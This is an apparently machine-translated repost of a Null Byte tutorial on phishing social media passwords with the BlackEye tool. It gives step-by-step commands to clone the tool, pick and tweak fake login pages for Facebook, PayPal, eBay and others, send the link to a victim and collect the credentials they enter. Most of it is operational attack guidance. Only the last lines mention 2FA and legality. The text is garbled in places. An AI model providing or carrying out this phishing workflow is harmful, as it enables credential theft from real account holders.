قالب وردپرس درنا توس
Home / Tips and Tricks / Phishing for social media and other account passwords with Blackeye «Null Byte :: WonderHowTo

Phishing for social media and other account passwords with Blackeye «Null Byte :: WonderHowTo



Social media accounts are a popular target for hackers, and the most effective tactic for attacking accounts on sites like Facebook, Instagram, and Twitter is often based on phishing. These password-stealing attacks assume that users are being tempted to enter their passwords on a compelling fake website. Thanks to tools like BlackEye they are getting easier and easier.

BlackEye is a tool for quickly generating phishing sites that target social media sites. This greatly facilitates the phishing of opportunity targets on the same network. After redirecting a target to the phishing site, you can easily capture passwords for social media accounts that were harvested by unintentional victims.

BlackEye for Social Phishing

Users rely heavily on their social media accounts. If 2FA is not activated for the victim, it can be surprising how easy an attacker can access them. A single mistake when entering a password into the wrong website may result in you being unable to access your account. BlackEye is a proof-of-concept that shows that these phishing sites do not need to be sophisticated or customized to work effectively.

BlackEye is a simple bash script that offers various templates to choose from, with which you can choose to emulate which social media site to use. It will create a working phishing site on your device that can be connected to your victim's computer via port forwarding or otherwise.

Supported Social Media Sites

BlackEye supports 32 different phishing sites templates, but these range in quality. It's best to test them before deployment because there are a few bugs they may reveal when a user is paying attention. Although the standard phishing pages provided with BlackEye are pretty good, it is always useful to be able to change them. For example, you can remove copyright notices from the wrong year.

Other sites that support BlackEye include Protonmail, Github, Gitlab, Adobe, Verizon, Twitter, Facebook, Shopify, PayPal, and Google. You can quickly test them by following the steps below and clicking the phishing URL to see how realistic each template is before use.

What you need

BlackEye is a very simple tool, but it works best with Kali Linux. This is due to the number of dependencies that are required for execution. However, these can be installed on Ubuntu or Debian devices as needed. Once you've completely updated a potash distribution, you should be ready to install BlackEye.

Step 1: Download and test BlackEye

First, you need to clone the source code from the BlackEyes GitHub repository. To do this, open a new terminal window and enter the following commands git and cd .

  ~ $ git clone https://github.com/thelinuxchoice/blackeye

Cloning in & # 39; blackeye & # 39; ...
remote: list objects: 361, done.
Remote: Total 361 (Delta 0), reused 0 (Delta 0), pack reused 361
Receive objects: 100% (361/361), 8.01 MiB | 3.17 MiB / s, done.
Deltas solve: 100% (101/101), done.

~ $ cd blackeye

~ / blackeye $ 

This should install and enable the BlackEye repository so that it can be run from the blackeye folder with the bash blackeye.sh command. When we execute the command, the welcome screen should be displayed below.

  ~ / blackeye $ bash blackeye.sh

:: Disclaimer: Developers assume no liability and are not ::
:: responsible for any abuse or damage caused by BlackEye. ::
:: Use only for educational purposes !! ::

:: Attacking targets without mutual consent is illegal! ::

[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████───────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitching ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] WordPress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODED BY: @thelinuxchoice
UPDATED BY: @suljot_gjoka 

Step 2: Customizing Phishing Web Sites

If we do not like something like an expired copyright notice, we can pretty easily change it. First, stop the Bash script and switch back to the Blackeye folder. Then we enter ls to display the folder sites in the BlackEye repository

  ~ / blackeye $ ls

blackeye.sh LICENSE README.md sites 

With the command cd sites we can navigate there. Then enter ls to view all the phishing site templates that can be changed.

  ~ / blackeye $ cd sites
~ / blackeye / sites $ ls

Adobe Cryptocurrency facebook google linkedin myspace shopify spotify twitter wordpress
badoo devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoo
To edit Protonmail, you can reenter  cd protonmail  and then  ls  to view the files in this folder. You should see something like the following files. 

  ~ / blackeye / sites $ cd protonmail
~ / blackeye / sites / protonmail $ ls

index.php index.php ip.php ip.txt login.html login.php saved.ip.txt saved.usernames.txt 

To edit the HTML code of the phishing page, open the login directly. html with a text editor that allows you to easily update copyright notices or other details.

Step 3: Open the phishing page

To start our phishing page, open a terminal window and navigate to the Blackeye folder again. Then run the bash blackeye.sh command to return to the phishing page selection menu. Here we choose eBay number 18.

  ~ / blackeye / sites / protonmail $ cd
~ $ cd blackeye
~ / blackeye $ bash blackeye.sh

[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Twitter [20] CryptoCurrency ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████───────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitching ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] VK ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] WordPress [31] Yandex ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] devianART CODED BY: @thelinuxchoice
UPDATED BY: @suljot_gjoka

[*] Select an option: 18 

After entering the number of the site you want to create, press and enter . Next, we are asked to provide our IP address. If you press Enter without adding one, it will try to add yours by default, but this will not always work. For example, after entering your IP address, you should see the following prompt.

  [*] Enter your local IP address (default 10.0.6.27):

[*] Starting the PHP server ...
[*] Send this link to the victim: 192.168.0.16
[*] Waiting for Victims Open Link ... 

Next, navigate to the phishing link in a browser to see the result of your phishing site.

Step 4: Capture Password

When you open the site In a browser, it should look something like this:

When you open the link, the Script the type of devices that are currently accessing the phishing page. [19659013] [*] Waiting for victims open the link ...

[*] IP found!
[*] Victim IP: 192.168.43.142
[*] User-Agent: User-Agent: Mozilla / 5.0 (x11; Linux x86_64; rv: 60.0) Gecko / 20100101 Firefox / 60.0
[*] Filed: shopping / saved.ip.txt

Once the victim enters his credentials, it will be redirected to the real eBay page, creating the illusion of a successful login.

On the hacker side, BlackEye provides us with the credentials our victim has just entered.

  [*] Waiting for credentials ...

[*] Credentials found!
[*] Account: Fudrucker
[*] Password: thefudruckerking69
[*] Filed: sites / shopping / saved.usernames.txt 

So we intercepted and stored the credentials a victim entered on our phishing site] When it comes to stopping such attacks, the Two-factor authentication the best friend of an average user. Otherwise, a single mistake can cause your password to be stolen and used by an attacker to gain access to your account. Set up 2FA on Facebook, Instagram and all other accounts.

Another step to improve security is to use a hardware security key so that new devices can log in with their key and render stolen passwords and emails, even intercepted text messages will not help. Keep in mind that while BlackEye simplifies phishing, it's not legal to steal passwords for accounts that you can not access.

I hope you liked this guide to phishing social media passwords! If you have questions about this tutorial on social media phishing tools, please contact us. If you have a comment or idea for a future episode, feel free to contact me on Twitter @KodyKinzie .

Don & # 39; t miss: steal Wi-Fi passwords with a nasty double attack

Cover photo and screenshots of Kody / Null Byte




Source link